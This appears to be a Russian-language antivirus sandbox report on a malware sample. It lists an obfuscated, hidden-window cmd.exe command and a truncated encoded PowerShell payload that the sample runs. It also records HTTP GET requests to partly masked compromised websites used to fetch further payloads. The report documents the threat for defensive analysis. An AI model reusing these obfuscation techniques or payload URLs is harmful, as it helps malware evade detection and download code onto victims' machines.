Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' PMMkCBEQWMWrM QHsQAHJnOJKDAWBKQj KMGlYMkEBGkB & %C^om^S^pEc% %C^om^S^pEc% /V /c set %aFnrrYqtwtbJsDh%=RzDWTafRZpL&&set %QzXEQElCkSNrH%=p&&set %iiszJthrWi%...
Сетевая активность
Подключается к
- 'ro###.lubelskie.pl':80
- 'uf###w.ufp.pt':80
- 'ta###g.com.br':80
TCP
Запросы HTTP GET
- http://uf###w.ufp.pt/wp-content/plugins/sd-theme-functions/m94fq/
- http://ta###g.com.br/PVtf/
UDP
- DNS ASK ro###.lubelskie.pl
- DNS ASK uf###w.ufp.pt
- DNS ASK es###ual.com.br
- DNS ASK ta###g.com.br
- DNS ASK to#####palmas.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' PMMkCBEQWMWrM QHsQAHJnOJKDAWBKQj KMGlYMkEBGkB & %C^om^S^pEc% %C^om^S^pEc% /V /c set %aFnrrYqtwtbJsDh%=RzDWTafRZpL&&set %QzXEQElCkSNrH%=p&&set %iiszJthrWi%...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "([runtIME.intERoPsErviCEs.MArsHAL]::PTrtOsTriNgbsTr( [RuNTimE.INteroPServIcES.MARSHal]::SeCUREsTrIngTobsTR( $('76492d1116743f0423413b16050a5345MgB8AEsASQA4AG0ANQBDAFkAMQBTAEgANgBhAGUAUAA5AHMAT...
